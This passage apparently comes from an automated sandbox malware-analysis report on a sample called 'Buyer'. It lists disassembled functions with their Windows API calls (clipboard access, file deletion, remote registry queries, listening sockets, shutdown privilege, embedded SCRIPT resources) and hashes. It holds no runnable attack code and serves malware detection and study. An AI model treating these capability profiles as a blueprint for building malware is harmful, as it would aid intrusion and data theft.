                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 420908878-0
                                                                                                    • Opcode ID: 2fb90f9b5f05105977b241dc5acb4b58bcacfdbe88e355c386464e59034ec0ed
                                                                                                    • Instruction ID: 0e39758217f700cb44399fedc623d8e75961ee1d5a6e0808e6b07c130c5b28e8
                                                                                                    • Opcode Fuzzy Hash: 2fb90f9b5f05105977b241dc5acb4b58bcacfdbe88e355c386464e59034ec0ed
                                                                                                    • Instruction Fuzzy Hash: 1761D0352042059FC310EF25DC84F6ABBE5EF84714F18852EF846872A2DB35DD49EBA2
                                                                                                    Function 00FB70FE Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FB712D
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FB7181
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB71BD
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB71E4
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB7221
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB724E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                    • Opcode ID: 80accc95e109793d8b640447de215bc77bebb1fdf00dccee8fc7009ed35de653
                                                                                                    • Instruction ID: 932ed8ea9b8a22a1e3e0d1610e2e0350b6036718537c587420f533d6320daf7e
                                                                                                    • Opcode Fuzzy Hash: 80accc95e109793d8b640447de215bc77bebb1fdf00dccee8fc7009ed35de653
                                                                                                    • Instruction Fuzzy Hash: 09D15272508300AFD314EBA5CC85EABB7ECAF88704F04491DF985D7291EB78D949DB62
                                                                                                    Function 00FB448D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB44AF
                                                                                                    • _wcslen.LIBCMT ref: 00FB44DC
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FB450C
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FB452D
                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00FB453D
                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FB45C4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FB45CF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FB45DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                    • String ID: :$\$\??\%s
                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                    • Opcode ID: 6605d70d2614c38c3b1983e976f6aa8eff56c674b2f7c5c6938bbc562deaeb1d
                                                                                                    • Instruction ID: 99dbfa69f3a71f25e6d94865303a046856b1988f9f5c619ab862e498ac492c80
                                                                                                    • Opcode Fuzzy Hash: 6605d70d2614c38c3b1983e976f6aa8eff56c674b2f7c5c6938bbc562deaeb1d
                                                                                                    • Instruction Fuzzy Hash: C331D2B2900109ABDB219FA1DC49FEB37BDEF89710F1040B6F609D6165EB74A7449F20
                                                                                                    Function 00FCC5CB Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC6C5
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00FCC730
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC754
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FCC7B3
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FCC86E
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC8DB
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC970
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCC9C1
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCCA6A
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCCB09
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCCB16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 3102970594-0
                                                                                                    • Opcode ID: b67a77dc09ece93f961399cb5ed3ba7cf367665a40340e4aca8965fbf8c44c9b
                                                                                                    • Instruction ID: 3a07a7b2133e01b75fb8ae5f60c5cc87010aa15f5e1fa8075e6332abc37ef9f4
                                                                                                    • Opcode Fuzzy Hash: b67a77dc09ece93f961399cb5ed3ba7cf367665a40340e4aca8965fbf8c44c9b
                                                                                                    • Instruction Fuzzy Hash: 9E026E716042019FC714DF28C995F2ABBE5EF88314F18849DF84ACB2A2D735ED46DB91
                                                                                                    Function 00FAD65B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FAD707
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00FAD7C2
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAD7D5
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FAD7F2
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FAD81C
                                                                                                      • Part of subcall function 00FAD881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00FAD801,?,?), ref: 00FAD897
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00FAD838
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FAD849
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                    • Opcode ID: f07e8412df304db103ef11a35423bcadbeb6f0b2f4230e7a54c4cb68f8160fde
                                                                                                    • Instruction ID: 99bd5993d1044e567856413391bf6bfa05aa6b81d5ba6e1fab740eb4ee328b61
                                                                                                    • Opcode Fuzzy Hash: f07e8412df304db103ef11a35423bcadbeb6f0b2f4230e7a54c4cb68f8160fde
                                                                                                    • Instruction Fuzzy Hash: 6A616371C0110DAFCF05EBA0DD929EDBBB9AF15310F204169E856B7191DB38AF09EB61
                                                                                                    Function 00FBF4F1 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1737998785-0
                                                                                                    • Opcode ID: 006caf9efc63fdc1f61c75fbd6487d82a5dec1551e4bbaec37c8127c3a95a5ea
                                                                                                    • Instruction ID: 9660a1f20b2f8345326f9c2b609ea3d6f87c6bcff1e3b80ffd1790c57fb901ee
                                                                                                    • Opcode Fuzzy Hash: 006caf9efc63fdc1f61c75fbd6487d82a5dec1551e4bbaec37c8127c3a95a5ea
                                                                                                    • Instruction Fuzzy Hash: 5A419D35605611AFD720DF26E888F55BBA5EF44328F18C0A9E8198B662C735EC45EFD0
                                                                                                    Function 00FAEF37 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1DEF
                                                                                                      • Part of subcall function 00FA1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA1E1C
                                                                                                      • Part of subcall function 00FA1DA5: GetLastError.KERNEL32 ref: 00FA1E2C
                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00FAEF73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                    • Opcode ID: dd507d98118f0b5c7ec380581faa093c14c17276f0fdfe2e6b0b7ac1f75ec715
                                                                                                    • Instruction ID: da791e5471d2a0df177e6e4a77f2c4c3012580ba29ad692ddbfd75138eb1382a
                                                                                                    • Opcode Fuzzy Hash: dd507d98118f0b5c7ec380581faa093c14c17276f0fdfe2e6b0b7ac1f75ec715
                                                                                                    • Instruction Fuzzy Hash: 4B01F9F2B202146FF72466789C89FBF775CEB46350F150825FD02E70D1C6645C40B290
                                                                                                    Function 00FC198B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FC19FD
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A0A
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00FC1A41
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A4C
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1A7B
                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00FC1A8A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1A94
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1AC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 540024437-0
                                                                                                    • Opcode ID: cce0559d34ce398ce11366628318e3847b2174a53933ae6094875ff44981f17f
                                                                                                    • Instruction ID: 57191c3039533efbe4c9beaed28ca239290958043f5e254b6cbdeda608533af9
                                                                                                    • Opcode Fuzzy Hash: cce0559d34ce398ce11366628318e3847b2174a53933ae6094875ff44981f17f
                                                                                                    • Instruction Fuzzy Hash: 27418D31A011059FD714DF28C595F29BBE6BF46328F18818DD8568B293C775EC82EBE0
                                                                                                    Function 00FB3738 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F846DA,?,?,00000000,00000000), ref: 00FB3748
                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F846DA,?,?,00000000,00000000), ref: 00FB375F
                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533), ref: 00FB376F
                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533), ref: 00FB3780
                                                                                                    • LockResource.KERNEL32(00F846DA,?,?,00F846DA,?,?,00000000,00000000,?,?,?,?,?,?,00F45533,?), ref: 00FB378F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                    • String ID: SCRIPT
                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                    • Opcode ID: a2d6f406630c4fe2336536d3b1061c97e4eeed8f8bd9247236c63b4597816e3e
                                                                                                    • Instruction ID: d33bfbc22cd79885e7db698bf1446539be9d12f407486cda9c2afbf02a5fc813
                                                                                                    • Opcode Fuzzy Hash: a2d6f406630c4fe2336536d3b1061c97e4eeed8f8bd9247236c63b4597816e3e
                                                                                                    • Instruction Fuzzy Hash: 5F11A0B4640304BFD7218B66DC88F677BBEEFC5B11F20416DB44196150DB71E800AA21
                                                                                                    Function 00FBA29A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00FBA2E7
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00FBA3FA
                                                                                                      • Part of subcall function 00FB3FE3: GetInputState.USER32 ref: 00FB403A
                                                                                                      • Part of subcall function 00FB3FE3: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB40D5
                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00FBA317
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00FBA3E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1972594611-438819550
                                                                                                    • Opcode ID: c1c33f34136c2e0ce6d7db0525f1973397da2f3d224f9f09474e6ae811da8a5b
                                                                                                    • Instruction ID: ec52734909ef0084c2c4b5119ab8d1659b3ac2cf6414485b92278c7ec15f5ad4
                                                                                                    • Opcode Fuzzy Hash: c1c33f34136c2e0ce6d7db0525f1973397da2f3d224f9f09474e6ae811da8a5b
                                                                                                    • Instruction Fuzzy Hash: 4B418171D40209EFDF15DFA5CD49AEEBBB5EF04320F244056E805A2191EB369E84EF52
                                                                                                    Function 00F59BAD Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F59C7E
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F59D53
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00F59D66
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3131106179-0
                                                                                                    • Opcode ID: 87d882fd14e6b7c613c89a79153070d51a83060e28250a0606114f4c704abc42
                                                                                                    • Instruction ID: e0617da5b46f1af83f3ddeac71a4528a4394aa9c9a4d2b5bb892b9e2a7049f3c
                                                                                                    • Opcode Fuzzy Hash: 87d882fd14e6b7c613c89a79153070d51a83060e28250a0606114f4c704abc42
                                                                                                    • Instruction Fuzzy Hash: EBA10B7151D304FAEB3CBA3C9C4CF7B3A6DEB82361B15010BFA42C6695C5999D05B271
                                                                                                    Function 00FD23FC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                    • String ID:
                                                                                                    • API String ID: 292994002-0
                                                                                                    • Opcode ID: 6024efa93c44c8c5fa6bf8f6f4f323229ec87373e9574ce21f370b97dfffb64d
                                                                                                    • Instruction ID: 14a9f88e9eb8dba8e1d9f5f4fb203fb097007175477d182360a585cd93d78df2
                                                                                                    • Opcode Fuzzy Hash: 6024efa93c44c8c5fa6bf8f6f4f323229ec87373e9574ce21f370b97dfffb64d
                                                                                                    • Instruction Fuzzy Hash: FE21F331B012008FD750DF2AC844B1A7B96BFA6324B1C805AEC498B352DB75DC42EBE1
                                                                                                    Function 00FBD5B3 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FBD5F8
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00FBD659
                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00FBD66D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 234945975-0
                                                                                                    • Opcode ID: 37fcbf1054bbc7122792d998305e596809cd8e43245b18b6637bb213b6a58498
                                                                                                    • Instruction ID: 08fc7e2f9d809d4267c307303a46c29294067279c60fc1d972f76ff299384b13
                                                                                                    • Opcode Fuzzy Hash: 37fcbf1054bbc7122792d998305e596809cd8e43245b18b6637bb213b6a58498
                                                                                                    • Instruction Fuzzy Hash: FC21C1B1900708AFD7209F66CC48B9A77F9EF40328F10441AE54AD2141E774EE44EF55
                                                                                                    Function 00F9E4B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
